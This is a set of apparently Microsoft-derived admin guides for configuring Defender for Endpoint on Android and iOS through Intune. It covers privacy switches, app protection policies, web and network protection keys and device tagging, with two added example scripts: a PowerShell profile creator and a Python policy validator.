1. In the Microsoft Intune admin center, go to Devices > Configuration profiles > Create profile and enter the following settings:
   - Platform: Select Android device administrator.
   - Profile: Select "Custom" and select Create.
2. In the Basics section, specify a name and description of the profile.
3. In the Configuration settings, select Add OMA-URI setting:
   - Name: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
   - OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderExcludeAppInReport
   - Data type: Select Integer in the drop-down list.
   - Value: Enter 1 to enable the privacy setting. The default value is 0.
4. Select Next and assign this profile to targeted devices/users.

Using this privacy control won't impact the device compliance check or conditional access. For example, devices with a malicious app will always have a risk level of "Medium".

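The three device administrator procedures above (vulnerability assessment privacy, phishing alert report privacy, and malware alert report privacy) each create an Android device administrator custom profile with a single integer OMA-URI setting. The PowerShell below is an added example, not taken from this page or from Microsoft: it builds one such profile carrying all three OMA-URIs through the Microsoft Graph deviceConfigurations endpoint, so the values are set in code rather than clicked through the portal three times. Assumptions made for the example: the Microsoft Graph PowerShell SDK is installed, the signed-in account can consent to DeviceManagementConfiguration.ReadWrite.All, the profile name is a placeholder, the helper function name is invented, and the request body follows the Graph androidCustomConfiguration and omaSettingInteger resource types. The values chosen leave all three privacy switches on; set DefenderTVMPrivacyMode to 0, or either report key to 0, to turn one off as the page describes.

```powershell
# Added example (not from the Microsoft Learn page): create one Android device
# administrator custom profile that sets the three Defender OMA-URI privacy
# switches the page walks through. Assumes the Microsoft Graph PowerShell SDK is
# installed; the profile name is a placeholder and the helper name is invented.

function New-DefenderPrivacyOmaSetting {
    # Builds one integer OMA-URI entry in the shape of the Graph omaSettingInteger type.
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$OmaUri,
        [Parameter(Mandatory)][ValidateSet(0, 1)][int]$Value
    )
    return @{
        '@odata.type' = '#microsoft.graph.omaSettingInteger'
        displayName   = $Name
        omaUri        = $OmaUri
        value         = $Value
    }
}

$omaSettings = @(
    # Vulnerability assessment of apps: 1 keeps privacy on (the default for device
    # admin mode); 0 lets Defender send the installed app list for assessment.
    New-DefenderPrivacyOmaSetting -Name 'Defender TVM privacy mode' `
        -OmaUri './Vendor/MSFT/DefenderATP/DefenderTVMPrivacyMode' -Value 1
    # Phishing alert report: 1 withholds domain and website details (default 0).
    New-DefenderPrivacyOmaSetting -Name 'Defender hide URLs in phishing report' `
        -OmaUri './Vendor/MSFT/DefenderATP/DefenderExcludeURLInReport' -Value 1
    # Malware threat report: 1 withholds app name and package details (default 0).
    New-DefenderPrivacyOmaSetting -Name 'Defender hide app details in malware report' `
        -OmaUri './Vendor/MSFT/DefenderATP/DefenderExcludeAppInReport' -Value 1
)

$profileBody = @{
    '@odata.type' = '#microsoft.graph.androidCustomConfiguration'
    displayName   = 'Defender for Endpoint - Android DA privacy controls'   # placeholder name
    description   = 'Privacy switches for the TVM, phishing and malware reports'
    omaSettings   = $omaSettings
}

Connect-MgGraph -Scopes 'DeviceManagementConfiguration.ReadWrite.All'

$created = Invoke-MgGraphRequest -Method POST `
    -Uri 'https://graph.microsoft.com/v1.0/deviceManagement/deviceConfigurations' `
    -Body ($profileBody | ConvertTo-Json -Depth 5) -ContentType 'application/json'

# The returned id identifies the profile you then assign to the targeted
# devices/users (step 4 of each procedure on the page).
$created.id
```

The profile is created unassigned; assignment to groups is still the last step of each procedure, and, as the page notes for every one of these switches, none of them changes the device compliance check or conditional access outcome.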
Configure privacy for malware alert report on Android Enterprise work profile

Use the following steps to turn on privacy for targeted users in the work profile:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, Platform > Android Enterprise, select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add DefenderExcludeAppInReport as the key and Integer as the value type. Enter 1 to enable privacy. The default value is 0.
5. Select Next and assign this profile to targeted devices/users.

Using this privacy control won't impact the device compliance check or conditional access. For example, devices with a malicious app will always have a risk level of "Medium".

Disable sign-out

Defender for Endpoint supports deployment without the sign-out button in the app to prevent users from signing out of the Defender app. This is important to prevent users from tampering with the device. Use the following steps to configure Disable sign-out:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, select Platform > Android Enterprise, and select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add Disable Sign Out as the key and Integer as the value type.
   - By default, Disable Sign Out = 1 for Android Enterprise personally owned work profiles, fully managed, and company owned personally enabled profiles, and 0 for device administrator mode.
   - Admins need to set Disable Sign Out = 0 to enable the sign-out button in the app. Users will be able to see the sign-out button once the policy is pushed.
5. Select Next and assign this profile to targeted devices and users.

) Important

This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Device Tagging

Defender for Endpoint on Android enables bulk tagging of mobile devices during onboarding by allowing admins to set up tags via Intune. Admins can configure the device tags through Intune via configuration policies and push them to users' devices. Once the user installs and activates Defender, the client app passes the device tags to the Security Portal. The device tags appear against the devices in the Device Inventory.

Use the following steps to configure the device tags:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, select Platform > Android Enterprise, and select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add DefenderDeviceTag as the key and String as the value type.
   - Admins can assign a new tag by adding the key DefenderDeviceTag and setting a value for the device tag.
   - Admins can edit an existing tag by modifying the value of the key DefenderDeviceTag.
   - Admins can delete an existing tag by removing the key DefenderDeviceTag.
5. Click Next and assign this policy to targeted devices and users.

7 Note

The Defender app needs to be opened for tags to be synced with Intune and passed to the Security Portal. It may take up to 18 hours for tags to reflect in the portal.

Related articles
Overview of Microsoft Defender for Endpoint on Android
Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune

Configure Microsoft Defender for Endpoint on Android risk signals using App Protection Policies (MAM)
Article • 01/05/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Microsoft Defender for Endpoint on Android, which already protects enterprise users on
Mobile Device Management (MDM) scenarios, now extends support to Mobile App
Management (MAM), for devices that aren't enrolled using Intune mobile device
management (MDM). It also extends this support to customers who use other enterprise
mobility management solutions, while still using Intune for mobile application
management (MAM). This capability allows you to manage and protect your
organization's data within an application.

Microsoft Defender for Endpoint on Android threat information is applied by Intune App
Protection Policies to protect these apps. App protection policies (APP) are rules that
ensure an organization's data remains safe or contained in a managed app. A managed
application has app protection policies applied to it and can be managed by Intune.

Microsoft Defender for Endpoint on Android supports both MAM configurations:

Intune MDM + MAM: IT administrators can only manage apps using App Protection Policies on devices that are enrolled with Intune mobile device management (MDM).
MAM without device enrollment: MAM without device enrollment, or MAM-WE, allows IT administrators to manage apps using App Protection Policies on devices not enrolled with Intune MDM. This means that apps can be managed by Intune on devices enrolled with third-party EMM providers. To manage apps in both these configurations, customers should use Intune in the Microsoft Intune admin center.

To enable this capability, an administrator needs to configure the connection between Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply the policy to targeted devices and applications. End users also need to install Microsoft Defender for Endpoint on their device and complete the onboarding flow.

Admin prerequisites
Validate that the Microsoft Defender for Endpoint-Intune connector is enabled.

a. Go to security.microsoft.com.

b. Select Settings > Endpoints > Advanced Features and check that Microsoft Intune Connection is turned on.

c. If the connection isn't turned on, select the toggle to turn it on and then select Save Preferences.

d. Go to the Microsoft Intune admin center and validate whether the Microsoft Defender for Endpoint-Intune connector is enabled.

Enable the Microsoft Defender for Endpoint on Android connector for App Protection Policy (APP).

Configure the connector in Microsoft Intune for app protection policies:

a. Go to Tenant Administration > Connectors and Tokens > Microsoft Defender for Endpoint.

b. Turn on the toggle for the app protection policy for Android (as seen in the following screenshot).

c. Select Save.

Create an app protection policy.

Block access or wipe data of a managed app based on Microsoft Defender for Endpoint risk signals by creating an app protection policy.

Microsoft Defender for Endpoint can be configured to send threat signals to be used in app protection policies (APP, also known as MAM). With this capability, you can use Microsoft Defender for Endpoint to protect managed apps.

1. Create a policy.

App protection policies (APP) are rules that ensure an organization's data
remains safe or contained in a managed app. A policy can be a rule that is
enforced when the user attempts to access or move "corporate" data, or a set
of actions that are prohibited or monitored when the user is inside the app.

2. Add apps.

a. Choose how you want to apply this policy to apps on different devices. Then add at least one app.

Use this option to specify whether this policy applies to unmanaged devices. In Android, you can specify that the policy applies to Android Enterprise, Device Admin, or Unmanaged devices. You can also choose to target your policy to apps on devices of any management state.

Because mobile app management doesn't require device management, you can protect company data on both managed and unmanaged devices. The management is centered on the user identity, which removes the requirement for device management. Companies can use app protection policies with or without MDM at the same time. For example, consider an employee who uses both a phone issued by the company and their own personal tablet. The company phone is enrolled in MDM and protected by app protection policies, while the personal device is protected by app protection policies only.

b. Select Apps.

A managed app is an app that has app protection policies applied to it and can be managed by Intune. Any app that has been integrated with the Intune SDK or wrapped by the Intune App Wrapping Tool can be managed using Intune app protection policies. See the official list of Microsoft Intune protected apps that have been built using these tools and are available for public use.

Example: Outlook as a managed app

3. Set sign-in security requirements for your protection policy.

Select Setting > Max allowed device threat level in Device Conditions and enter a value. Then select Action: "Block Access". Microsoft Defender for Endpoint on Android shares this Device Threat Level.

4. Assign user groups for whom the policy needs to be applied.

Select Included groups. Then add the relevant groups.

Note

If a config policy is to be targeted at unenrolled devices (MAM), the recommendation is to deploy the general app configuration settings in Managed Apps instead of using Managed Devices. When deploying app configuration policies to devices, issues can occur when multiple policies have different values for the same configuration key and are targeted at the same app and user. These issues are due to the lack of a conflict resolution mechanism for the differing values. You can prevent these issues by ensuring that only a single app configuration policy for devices is defined and targeted at the same app and user.

End-user prerequisites
The broker app must be installed: Intune Company Portal.

Users have the required licenses for the managed app and have the app installed.

End-user onboarding
1. Sign in to a managed application, for example, Outlook. The device is registered and the application protection policy is synchronized to the device. The application protection policy recognizes the device's health state.

2. Select Continue. A screen is presented that recommends downloading and setting up the Microsoft Defender for Endpoint on Android app.

3. Select Download. You'll be redirected to the app store (Google Play).

4. Install the Microsoft Defender for Endpoint (Mobile) app and return to the managed app onboarding screen.

5. Click Continue > Launch. The Microsoft Defender for Endpoint app onboarding/activation flow is initiated. Follow the steps to complete onboarding. You'll automatically be redirected back to the managed app onboarding screen, which now indicates that the device is healthy.

6. Select Continue to log into the managed application.

Configure Web protection
Defender for Endpoint on Android allows IT administrators to configure web protection. Web protection is available within the Microsoft Intune admin center.

Web protection helps to secure devices against web threats and protect users from phishing attacks. Note that anti-phishing and custom indicators (URL and IP addresses) are supported as part of web protection. Web content filtering is currently not supported on mobile platforms.

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.

2. Give the policy a name.

3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.

4. In the Settings page, under the General Configuration Settings, add the following keys and set their values as required:

antiphishing
vpn

To disable web protection, enter 0 for both the antiphishing and vpn values.
To disable only the use of VPN by web protection, enter these values:

0 for vpn
1 for antiphishing

Add the DefenderMAMConfigs key and set the value as 1.

5. Assign this policy to users. By default, this value is set to false.

6. Review and create the policy.

Configure Network Protection
1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies. Create a new App configuration policy. Click Managed Apps.

2. Provide a name and description to uniquely identify the policy. Target the policy to 'Selected apps' and search for 'Microsoft Defender Endpoint for Android'. Click the entry and then click Select and then Next.

3. Add the key and value from the following table. Ensure that the "DefenderMAMConfigs" key is present in every policy that you create using the Managed Apps route. For the Managed Devices route, this key shouldn't exist. When you're done, click Next.

Each entry below lists the key, its value type, its default, and a description (for String keys, true - enable, false - disable).

Key: DefenderNetworkProtectionEnable
Value type: Integer
Default: 0
Description: 1 - Enable, 0 - Disable; this setting is used by IT admins to enable or disable the network protection capabilities in the Defender app.

Key: DefenderAllowlistedCACertificates
Value type: String
Default: None
Description: None - Disable; this setting is managed by an admin to establish trust for root CA and self-signed certificates.

Key: DefenderCertificateDetection
Value type: Integer
Default: 1
Description: 0 - Disable, 1 - Audit mode, 2 - Enable; when network protection is enabled, audit mode for certificate detection is enabled by default. In audit mode, notification alerts are sent to SOC admins, but no end user notifications are displayed to the user when Defender detects a bad certificate. Admins can disable this detection with 0 as the value and enable full feature functionality by setting 2 as the value. When this feature is enabled with value 2, end user notifications are sent to the user when Defender detects a bad certificate. Alerts are also sent to SOC admins.

Key: DefenderOpenNetworkDetection
Value type: Integer
Default: 0
Description: 1 - enable, 0 - disable; this setting is managed by IT admins to enable or disable open network detection informational alerts with no end user detection experience.

Key: DefenderEndUserTrustFlowEnable
Value type: String
Default: false
Description: true - enable, false - disable; this setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust unsecure and suspicious networks.

Key: DefenderNetworkProtectionAutoRemediation
Value type: String
Default: true
Description: true - enable, false - disable; this setting is used by the IT admin to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer Wi-Fi access points or deleting suspicious certificates detected by Defender.

Key: DefenderNetworkProtectionPrivacy
Value type: String
Default: true
Description: true - enable, false - disable; this setting is managed by IT admins to enable or disable privacy in network protection.

4. Include or exclude the groups you want the policy to apply to. Proceed to review and submit the policy.

Note

Users need to enable the location permission (which is an optional permission); this enables Defender for Endpoint to scan their networks and alert them when there are Wi-Fi-related threats. If the location permission is denied by the user, Defender for Endpoint will only be able to provide limited protection against network threats and will only protect users from rogue certificates.
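As an added example that is not Microsoft's code and does not use the real Intune policy format, the following Python script encodes the key and value rules from the network protection table above together with the DefenderMAMConfigs routing rule from step 3, and flags the conflict warned about earlier in this article, where two policies that target the same app and user set different values for the same key. The in-memory policy records, policy names and group names are constructed for the example.

```python
"""Validate Defender for Endpoint on Android app configuration policies.

Added example using a hypothetical in-memory policy model (not the real Intune
or Graph schema): it checks the documented network protection key/value rules,
the DefenderMAMConfigs routing rule, and conflicts between overlapping policies.
"""
from dataclasses import dataclass, field
from itertools import combinations

# Allowed value type and values per key, taken from the network protection
# table above. An allowed set of None means any string is accepted.
NETWORK_PROTECTION_SCHEMA = {
    "DefenderNetworkProtectionEnable": ("Integer", {0, 1}),
    "DefenderAllowlistedCACertificates": ("String", None),
    "DefenderCertificateDetection": ("Integer", {0, 1, 2}),
    "DefenderOpenNetworkDetection": ("Integer", {0, 1}),
    "DefenderEndUserTrustFlowEnable": ("String", {"true", "false"}),
    "DefenderNetworkProtectionAutoRemediation": ("String", {"true", "false"}),
    "DefenderNetworkProtectionPrivacy": ("String", {"true", "false"}),
}
MAM_MARKER_KEY = "DefenderMAMConfigs"


@dataclass
class AppConfigPolicy:
    name: str
    route: str                 # "managed_apps" (MAM) or "managed_devices" (MDM)
    target_app: str
    groups: frozenset          # included user groups (constructed names)
    settings: dict = field(default_factory=dict)


def validate_policy(policy):
    """Return a list of problems found in one policy (empty when it is clean)."""
    problems = []
    if policy.route == "managed_apps":
        # Managed Apps route: DefenderMAMConfigs must be present and set to 1
        if policy.settings.get(MAM_MARKER_KEY) != 1:
            problems.append(f"{policy.name}: Managed Apps policy must set {MAM_MARKER_KEY}=1")
    elif policy.route == "managed_devices":
        # Managed Devices route: the key must not exist at all
        if MAM_MARKER_KEY in policy.settings:
            problems.append(f"{policy.name}: {MAM_MARKER_KEY} must not be present on the Managed Devices route")
    else:
        problems.append(f"{policy.name}: unknown route {policy.route!r}")

    for key, value in policy.settings.items():
        if key == MAM_MARKER_KEY:
            continue
        if key not in NETWORK_PROTECTION_SCHEMA:
            problems.append(f"{policy.name}: unknown key {key}")
            continue
        value_type, allowed = NETWORK_PROTECTION_SCHEMA[key]
        if value_type == "Integer":
            # bool is a subclass of int, so reject True/False explicitly
            if isinstance(value, bool) or not isinstance(value, int):
                problems.append(f"{policy.name}: {key} expects an Integer, got {value!r}")
                continue
        elif not isinstance(value, str):
            problems.append(f"{policy.name}: {key} expects a String, got {value!r}")
            continue
        if allowed is not None and value not in allowed:
            problems.append(f"{policy.name}: {key}={value!r} is not one of {sorted(allowed)}")
    return problems


def find_conflicts(policies):
    """Return (key, policy_a, policy_b) for policies that target the same app,
    share at least one group, and set different values for the same key."""
    conflicts = []
    for a, b in combinations(policies, 2):
        if a.target_app != b.target_app or not (a.groups & b.groups):
            continue
        for key in sorted(a.settings.keys() & b.settings.keys()):
            if a.settings[key] != b.settings[key]:
                conflicts.append((key, a.name, b.name))
    return conflicts


# Constructed sample policies; policy and group names are made up.
APP = "Microsoft Defender for Endpoint"
SAMPLE_POLICIES = [
    AppConfigPolicy("NP-MAM-Audit", "managed_apps", APP, frozenset({"Sales", "Field"}),
                    {"DefenderMAMConfigs": 1, "DefenderNetworkProtectionEnable": 1,
                     "DefenderCertificateDetection": 1}),
    AppConfigPolicy("NP-MAM-Enforce", "managed_apps", APP, frozenset({"Field"}),
                    {"DefenderMAMConfigs": 1, "DefenderNetworkProtectionEnable": 1,
                     "DefenderCertificateDetection": 2}),
    AppConfigPolicy("NP-MDM-Bad", "managed_devices", APP, frozenset({"Kiosks"}),
                    {"DefenderMAMConfigs": 1, "DefenderNetworkProtectionEnable": "true",
                     "DefenderEndUserTrustFlowEnable": "yes"}),
]

if __name__ == "__main__":
    for policy in SAMPLE_POLICIES:
        print(policy.name, validate_policy(policy) or "OK")
    for key, a, b in find_conflicts(SAMPLE_POLICIES):
        print(f"conflict on {key} between {a} and {b}")
```

The two MAM policies are each valid on their own but overlap on the Field group with different DefenderCertificateDetection values, which is exactly the unresolved-conflict case the note above describes.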

Configure privacy controls
Admins can use the following steps to enable privacy and not collect the domain name, app details, and network information as part of the alert report for corresponding threats.

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.

2. Give the policy a name.

3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.

4. On the Settings page, under General Configuration Settings, add DefenderExcludeURLInReport and DefenderExcludeAppInReport as the keys and set the value as 1.

5. Add the DefenderMAMConfigs key and set the value as 1.

6. Assign this policy to users. By default, this value is set to 0.

7. In the Settings page, under General Configuration Settings, add DefenderExcludeURLInReport and DefenderExcludeAppInReport as the keys and set the value as true.

8. Add the DefenderMAMConfigs key and set the value as 1.

9. Assign this policy to users. By default, this value is set to false.

10. Review and create the policy.

Optional permissions
Microsoft Defender for Endpoint on Android enables Optional Permissions in the onboarding flow. Currently the permissions required by MDE are mandatory in the onboarding flow. With this feature, admins can deploy MDE on Android devices with MAM policies without enforcing the mandatory VPN and Accessibility permissions during onboarding. End users can onboard the app without the mandatory permissions and can review these permissions later.

Configure optional permission
Use the following steps to enable Optional permissions for devices.

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.

2. Give the policy a name.

3. Select Microsoft Defender for Endpoint in public apps.

4. On the Settings page, select Use configuration designer and add DefenderOptionalVPN or DefenderOptionalAccessibility or both as the key.

5. Add the DefenderMAMConfigs key and set the value as 1.

6. To enable Optional permissions, enter the value as 1 and assign this policy to users. By default, this value is set to 0. Users with the key set as 1 are able to onboard the app without giving these permissions.

7. In the Settings page, select Use configuration designer and add DefenderOptionalVPN or DefenderOptionalAccessibility or both as the key, with value type Boolean.

8. Add the DefenderMAMConfigs key and set the value as 1.

9. To enable Optional permissions, enter the value as true and assign this policy to users. By default, this value is set to false. Users with the key set as true are able to onboard the app without giving these permissions.

10. Select Next and assign this profile to targeted devices/users.

User flow
Users can install and open the app to start the onboarding process.

1. If an admin has set up Optional permissions, users can choose to skip the VPN or accessibility permission, or both, and complete onboarding.

2. Even if the user has skipped these permissions, the device is able to onboard, and a heartbeat is sent.

3. Since the permissions are disabled, Web protection won't be active. It will be partially active if one of the permissions is given.

4. Later, users can enable Web protection from within the app. This installs the VPN configuration on the device.

Note

The Optional permissions setting is different from the Disable Web protection setting. Optional permissions only let the user skip the permissions during onboarding; the permissions remain available for the end user to review and enable later. Disable Web protection allows users to onboard the Microsoft Defender for Endpoint app without Web Protection, and it cannot be enabled later.

Disable sign out
Defender for Endpoint allows you to deploy the app with the sign out button disabled. By hiding the sign out button, users are prevented from signing out of the Defender app. This helps prevent tampering with the device when Defender for Endpoint isn't running.

Use the following steps to configure Disable sign out:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.
2. Provide the policy a name.
3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
4. In the Settings page, under the General Configuration Settings, add DisableSignOut as the key and set the value as 1.

By default, Disable Sign Out = 0.

Admin needs to set Disable Sign Out = 1 to disable the sign-out button in the app. Users will not see the sign out button once the policy is pushed to the device.

5. Select Next and assign this profile to targeted devices and users.

Important

This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Device Tagging
Defender for Endpoint on Android enables bulk tagging of mobile devices during onboarding by letting admins set up tags via Intune. Admins configure the device tags through Intune configuration policies and push them to users' devices. Once the user installs and activates Defender, the client app passes the device tags to the Security Portal, where the tags appear against the devices in the Device Inventory.

Use the following steps to configure the device tags:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.

2. Provide the policy a name.

3. Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.

4. In the Settings page, select Use configuration designer and add DefenderDeviceTag as the key, with value type String.

Admin can assign a new tag by adding the key DefenderDeviceTag and setting a value for the device tag.
Admin can edit an existing tag by modifying the value of the key DefenderDeviceTag.
Admin can delete an existing tag by removing the key DefenderDeviceTag.

5. Click Next and assign this policy to targeted devices and users.

Note

The Defender app needs to be opened for tags to be synced with Intune and passed to the Security Portal. It may take up to 18 hours for tags to appear in the portal.

Related topics
Overview of Microsoft Defender for Endpoint on Android
Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune


Microsoft Defender for Endpoint on Android - Privacy information
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint on Android collects information from your configured Android
devices and stores it in the same tenant where you have Defender for Endpoint. The
information is collected to help keep Defender for Endpoint for Android secure, up to
date, performing as expected, and to support the service.

For more information about data storage, see Microsoft Defender for Endpoint data
storage and privacy.

For more information on most common privacy questions about Microsoft Defender for
Endpoint on Android and iOS mobile devices, see Microsoft Defender for Endpoint and
your privacy on Android and iOS mobile devices .

Required Data
Required data consists of data that is necessary to make Defender for Endpoint for
Android work as expected. This data is essential to the operation of the service and can
include data related to the end user, organization, device, and apps. Here's a list of the
types of data being collected:

App information
Information about malicious Android application packages (APKs) on the device, including:

Install source
Storage location (file path) of the APK
Time of install, size of APK, and permissions

For Android Enterprise fully managed devices - information about Android application packages (APKs) installed on the device, including:

Name and package name of the app
Version number of the app
Vendor name

For Android Enterprise with a work profile - information about Android application packages (APKs) installed on the work profile of the device, including:

Name and package name of the app
Version number of the app
Vendor name

Your organization can also choose to configure Defender for Endpoint to send information about all apps installed on the device. By default, this information is not sent to your organization.

Web page / Network information
Full URL of the website, only when a malicious connection or web page is detected and blocked.
Connection information
Protocol type (such as HTTP, HTTPS, etc.)

Device and account information
Device information such as date & time, Android version, OEM model, CPU info, and device identifier.

The device identifier is one of the following:

Wi-Fi adapter MAC address
Android ID (as generated by Android at the time of first boot of the device)
Randomly generated globally unique identifier (GUID)

Tenant, Device and User information
Microsoft Entra Device ID and Azure User ID: uniquely identify the device and the user, respectively, in Microsoft Entra ID.
Azure tenant ID: GUID that identifies your organization within Microsoft Entra ID.
Microsoft Defender for Endpoint org ID: unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify whether issues are impacting a select set of enterprises and how many enterprises are impacted.
User Principal Name: email ID of the user

Product and service usage data
The following information is collected only for the Microsoft Defender for Endpoint app installed on the device.

App package info, including name, version, and app upgrade status.
Actions performed in the app.
Threat detection information, such as threat name, category, etc.
Crash report logs generated by Android.

Optional Data
Optional data includes diagnostic data and feedback data. Optional diagnostic data is additional data that helps us make product improvements and provides enhanced information to help us detect, diagnose, and fix issues. Optional diagnostic data includes:

App, CPU, and network usage.
State of the device from the app perspective, including scan status, scan timings, app permissions granted, and upgrade status.
Features configured by the admin.
Basic information about the browsers on the device.

Feedback data is collected through in-app feedback provided by the user:

The user's email address, if they choose to provide it.
Feedback type (smile, frown, idea) and any feedback comments submitted by the user.


Configure Microsoft Defender for Endpoint on iOS features
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Defender for Endpoint on iOS uses a VPN in order to provide the Web Protection feature. This is not a regular VPN; it is a local/self-looping VPN that does not take traffic outside the device.

Conditional Access with Defender for Endpoint on iOS
Microsoft Defender for Endpoint on iOS, along with Microsoft Intune and Microsoft Entra ID, enables enforcing device compliance and Conditional Access policies based on device risk score. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that you can deploy to use this capability via Intune.

For more information about how to set up Conditional Access with Defender for Endpoint on iOS, see Defender for Endpoint and Intune.

Web Protection and VPN
By default, Defender for Endpoint on iOS includes and enables the web protection feature. Web protection helps to secure devices against web threats and protect users from phishing attacks. Anti-phishing and custom indicators (URL and Domain) are supported as part of Web Protection. IP-based custom indicators are currently not supported on iOS. Web Content Filtering is currently not supported on mobile platforms (Android and iOS).

Defender for Endpoint on iOS uses a VPN in order to provide this capability. Note that the VPN is local, and unlike a traditional VPN, network traffic isn't sent outside the device.

While enabled by default, there might be some cases that require you to disable the VPN. For example, you want to run some apps that don't work when a VPN is configured. In such cases, you can choose to disable the VPN from the app on the device by following these steps:

1. On your iOS device, open the Settings app, select General and then VPN.

2. Select the i button for Microsoft Defender for Endpoint.

3. Toggle off Connect On Demand to disable the VPN.

Note

Web Protection isn't available when the VPN is disabled. To re-enable Web Protection, open the Microsoft Defender for Endpoint app on the device and click or tap Start VPN.

Disable Web Protection
Web Protection is one of the key features of Defender for Endpoint, and it requires a VPN to provide that capability. The VPN used is a local/loopback VPN and not a traditional VPN; however, there are several reasons for which customers might not prefer the VPN. For customers who don't want to set up a VPN, there's an option to disable Web Protection and deploy Defender for Endpoint without that feature. Other Defender for Endpoint features continue to work.

This configuration is available for both enrolled (MDM) devices and unenrolled (MAM) devices. For customers with MDM, admins can configure Web Protection through Managed devices in the App Config. For customers without enrollment, using MAM, admins can configure Web Protection through Managed apps in the App Config.

Configure Web Protection
1. Disable Web Protection (MDM). Use the following steps to disable Web Protection for enrolled devices.

In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
Give the policy a name, Platform > iOS/iPadOS.
Select Microsoft Defender for Endpoint as the target app.
In the Settings page, select Use configuration designer and add WebProtection as the key, with value type String.
By default, WebProtection = true.
Admin needs to set WebProtection = false to switch off web protection.
Defender sends the heartbeat to the Microsoft Defender portal whenever the user opens the app.
Select Next and assign this profile to targeted devices/users.

2. Disable Web Protection (MAM). Use the following steps to disable Web Protection for unenrolled devices.

In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed apps.
Give the policy a name.
Under Select Public Apps, choose Microsoft Defender for Endpoint as the target app.
In the Settings page, under the General Configuration Settings, add WebProtection as the key and value as false.
By default, WebProtection = true.
Admin needs to set WebProtection = false to switch off web protection.
Defender sends the heartbeat to the Microsoft Defender portal whenever the user opens the app.
Select Next and assign this profile to targeted devices/users.

Configure Network Protection
Network protection in Microsoft Defender for Endpoint is disabled by default. Admins can use the following steps to configure Network Protection. This configuration is available for both enrolled devices through MDM config and unenrolled devices through MAM config.

Note

Only one policy should be created for Network Protection, either MDM or MAM.

For enrolled devices (MDM)
Follow the steps below to set up the MDM configuration for enrolled devices for Network protection.

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed devices.

2. Provide a name and description for the policy. Under Platform, choose iOS/iPad.

3. In the targeted app, choose Microsoft Defender for Endpoint.

4. In the Settings page, choose the configuration settings format Use configuration designer.

5. Add 'DefenderNetworkProtectionEnable' as the configuration key, value type as 'String' and value as 'true' to enable Network Protection. (Network protection is disabled by default.)

6. For other configurations related to Network protection, add the following keys, choosing the corresponding value type and value.

Each entry below lists the key, its value type, its default, and a description (for String keys, true - enable, false - disable).

Key: DefenderOpenNetworkDetection
Value type: Integer
Default: 0
Description: 1 - Audit, 0 - Disable (default), 2 - Enable. This setting is managed by an IT admin to audit, disable, or enable open network detection, respectively. In 'Audit' mode, alerts are sent only to the ATP portal with no end-user experience. For an end-user experience, set the config to 'Enable' mode.

Key: DefenderEndUserTrustFlowEnable
Value type: String
Default: false
Description: true - enable, false - disable; this setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust unsecure and suspicious networks.

Key: DefenderNetworkProtectionAutoRemediation
Value type: String
Default: true
Description: true - enable, false - disable; this setting is used by the IT admin to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer Wi-Fi access points or deleting suspicious certificates detected by Defender.

Key: DefenderNetworkProtectionPrivacy
Value type: String
Default: true
Description: true - enable, false - disable; this setting is managed by the IT admin to enable or disable privacy in network protection.

7. In the Assignments section, the admin can choose groups of users to include and exclude from the policy.

8. Review and create the configuration policy.

For unenrolled devices (MAM)
Follow the steps below to set up the MAM config for unenrolled iOS devices for Network protection (Authenticator device registration is required for MAM configuration). Network Protection initialization requires the end user to open the app once.

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies > Add > Managed apps > Create a new App configuration policy.

2. Provide a name and description to uniquely identify the policy. Then select Select Public apps, and choose Microsoft Defender for Platform iOS/iPadOS.

3. On the Settings page, add DefenderNetworkProtectionEnable as the key and the value as true to enable network protection. (Network protection is disabled by default.)

4. For other configurations related to network protection, add the following keys and the appropriate corresponding value.

Each entry below lists the key, its default, and a description (true - enable, false - disable).

Key: DefenderOpenNetworkDetection
Default: 0
